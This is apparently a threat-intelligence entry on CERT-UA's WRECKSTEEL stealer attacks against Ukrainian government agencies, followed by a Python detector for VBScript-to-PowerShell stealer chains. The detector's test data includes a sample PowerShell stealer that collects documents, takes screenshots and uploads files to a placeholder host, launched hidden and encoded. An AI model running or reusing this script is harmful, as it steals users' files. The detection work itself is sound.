In March 2025, CERT-UA, Ukraine's state computer emergency response team, detected three targeted cyberattacks that used WRECKSTEEL malware to exfiltrate sensitive data from government agencies and critical infrastructure. The intrusions began with spear-phishing emails carrying malicious links that delivered VBScript- and PowerShell-based versions of the WRECKSTEEL stealer; the stealer searched for and extracted a range of sensitive file types and took screenshots for reconnaissance and further exploitation. The tools establish no persistence mechanism, so a compromised host retains no foothold to be found later; CERT-UA therefore asks that any sign of intrusion be reported to it immediately so that protective actions can be initiated. These incidents underscore the sustained threat to Ukrainian digital infrastructure in a geopolitically tense environment.
TPRM report: https://scoringcyber.rankiteo.com/company/cert-ua
"id": "cer000040525",
"linkid": "cert-ua",
"type": "Breach",
"date": "4/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization’s existence"
{'affected_entities': [{'industry': 'Public Sector',
                        'location': 'Ukraine',
                        'name': 'Ukrainian Government Agencies and Critical Infrastructure',
                        'type': 'Government'}],
 'attack_vector': 'Spear-phishing emails with malicious links',
 'data_breach': {'data_exfiltration': 'Yes',
                 'file_types_exposed': 'Variety of sensitive file types',
                 'sensitivity_of_data': 'High',
                 'type_of_data_compromised': 'Sensitive file types and screenshots'},
 'date_detected': 'March 2025',
 'description': "In March 2025, CERT-UA, Ukraine's state computer emergency response team, detected three targeted cyberattacks that used WRECKSTEEL malware to exfiltrate sensitive data from government agencies and critical infrastructure. The intrusions began with spear-phishing emails carrying malicious links that delivered VBScript- and PowerShell-based versions of the WRECKSTEEL stealer; the stealer searched for and extracted a range of sensitive file types and took screenshots for reconnaissance and further exploitation. The tools establish no persistence mechanism, so a compromised host retains no foothold to be found later; CERT-UA therefore asks that any sign of intrusion be reported to it immediately so that protective actions can be initiated. These incidents underscore the sustained threat to Ukrainian digital infrastructure in a geopolitically tense environment.",
 'impact': {'data_compromised': 'Variety of sensitive file types',
            'systems_affected': 'Government agencies and critical infrastructure'},
 'initial_access_broker': {'entry_point': 'Spear-phishing emails with malicious links',
                           'high_value_targets': 'Government agencies and critical infrastructure'},
 'lessons_learned': 'Immediate reporting of cyber intrusion signs to CERT-UA is crucial.',
 'motivation': 'Data Exfiltration',
 'post_incident_analysis': {'corrective_actions': 'Immediate reporting and protective actions',
                            'root_causes': 'Spear-phishing attacks utilizing WRECKSTEEL malware'},
 'recommendations': 'Enhance protective actions and monitoring mechanisms.',
 'references': [{'date_accessed': 'March 2025', 'source': 'CERT-UA'}],
 'response': {'third_party_assistance': 'CERT-UA'},
 'title': 'WRECKSTEEL Malware Attacks on Ukrainian Government Agencies and Critical Infrastructure',
 'type': 'Cyber Espionage'}
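The summary above gives a defender exactly one thing to key on: because the tooling sets up no persistence, there is no autostart entry or scheduled task to sweep for afterwards, and the only reliable signal is the live execution chain (a script host running a VBScript loader that spawns PowerShell, which then enumerates documents, captures the screen and uploads). The detector below is an added example written for this page, not CERT-UA's code or any published WRECKSTEEL indicator. It correlates constructed, Sysmon-shaped process-creation records and PowerShell 4104 script-block records per host; the flag patterns, extension list, screenshot/upload regexes, host names, paths and the `upload.example.invalid` URL are all assumptions made up for the example.

```python
"""Hunt for a non-persistent VBScript -> PowerShell stealer chain in process telemetry.

Added example, not CERT-UA code. Input events are constructed; every regex here is a
heuristic chosen for the example, not a published indicator.
"""
import base64
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # Windows script hosts that run VBScript
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Launch flags a loader uses to hide its PowerShell stage (assumption; tune per estate).
HIDDEN_LAUNCH = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass|enc(?:odedcommand)?\b)", re.I)
# Document/image extensions a stealer enumerates; >= 3 distinct ones count as collection.
DOC_EXT = re.compile(r"\*\.(docx?|xlsx?|pptx?|pdf|rtf|txt|jpe?g|png)\b", re.I)
SCREENSHOT = re.compile(r"CopyFromScreen|System\.Drawing\.Bitmap", re.I)
EXFIL = re.compile(r"UploadFile|UploadData|UploadString|Invoke-WebRequest|Invoke-RestMethod|curl\.exe", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -enc/-EncodedCommand, or '' if there is none."""
    m = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def script_indicators(text):
    """The three behaviours the summary attributes to the stealer, checked on script text."""
    exts = {e.lower() for e in DOC_EXT.findall(text)}
    return {"collects_documents": len(exts) >= 3,
            "takes_screenshots": bool(SCREENSHOT.search(text)),
            "uploads": bool(EXFIL.search(text))}


def analyze(events):
    """Correlate process-creation and 4104 script-block events per host; return findings."""
    hosts = defaultdict(lambda: {"chain": False, "cmdlines": [], "scripts": []})
    for ev in events:
        h = hosts[ev["host"]]
        if ev["event"] == "process_create":
            parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
            image = ev["image"].rsplit("\\", 1)[-1].lower()
            if parent in SCRIPT_HOSTS and image in POWERSHELL:   # script host -> PowerShell
                h["chain"] = True
                h["cmdlines"].append(ev["command_line"])
                decoded = decode_encoded_command(ev["command_line"])
                if decoded:
                    h["scripts"].append(decoded)
        elif ev["event"] == "script_block":                      # PowerShell event 4104
            h["scripts"].append(ev["script_text"])
    findings = []
    for host, h in hosts.items():
        ind = script_indicators("\n".join(h["scripts"]))
        hidden = any(HIDDEN_LAUNCH.search(c) for c in h["cmdlines"])
        full = (ind["collects_documents"] or ind["takes_screenshots"]) and ind["uploads"]
        if h["chain"] and full:
            verdict = "stealer_chain"
        elif full:
            verdict = "stealer_script"      # body seen via 4104, launch chain not captured
        elif h["chain"] and hidden:
            verdict = "suspicious_launch"   # hidden/encoded PowerShell from a script host
        else:
            continue
        findings.append({"host": host, "verdict": verdict, "hidden_launch": hidden, **ind})
    return findings


# --- constructed sample input (not real telemetry or real malware) -------------------
STEALER_PS = r"""
$files = Get-ChildItem -Path $env:USERPROFILE -Recurse -Include *.doc,*.docx,*.xls,*.xlsx,*.pdf,*.txt,*.jpg
Add-Type -AssemblyName System.Drawing
$bmp = New-Object System.Drawing.Bitmap 1920,1080
[System.Drawing.Graphics]::FromImage($bmp).CopyFromScreen(0, 0, 0, 0, $bmp.Size)
$wc = New-Object Net.WebClient
foreach ($f in $files) { $wc.UploadFile("http://upload.example.invalid/u", $f.FullName) }
"""
ENCODED = base64.b64encode(STEALER_PS.encode("utf-16-le")).decode()
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # host 1: wscript loader launches hidden, encoded PowerShell carrying the stealer body
    {"host": "WS-ACC-07", "event": "process_create", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": PS_PATH, "command_line": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"},
    # host 2: benign admin PowerShell from Explorer, body seen via 4104
    {"host": "WS-IT-02", "event": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": PS_PATH, "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"host": "WS-IT-02", "event": "script_block",
     "script_text": r"Get-ChildItem D:\Backups -Include *.bak | Compress-Archive -DestinationPath E:\bak.zip"},
    # host 3: cscript loader runs the stealer from a file; only 4104 logging reveals the body
    {"host": "WS-FIN-03", "event": "process_create", "parent_image": r"C:\Windows\System32\cscript.exe",
     "image": PS_PATH, "command_line": r"powershell.exe -File C:\Users\Public\update.ps1"},
    {"host": "WS-FIN-03", "event": "script_block", "script_text": STEALER_PS},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Two design points follow from the "no persistence" caveat. First, the verdict hinges on the parent/child relationship and the script body, not on any on-disk artifact, so process-creation logging with full command lines and PowerShell script-block logging must already be enabled when the phishing link is clicked; host 3 shows that without 4104 events a `-File` launch yields nothing to inspect. Second, because the stealer finishes in one pass, a `stealer_chain` hit is the trigger for the immediate CERT-UA report the summary calls for, not the start of a longer watch.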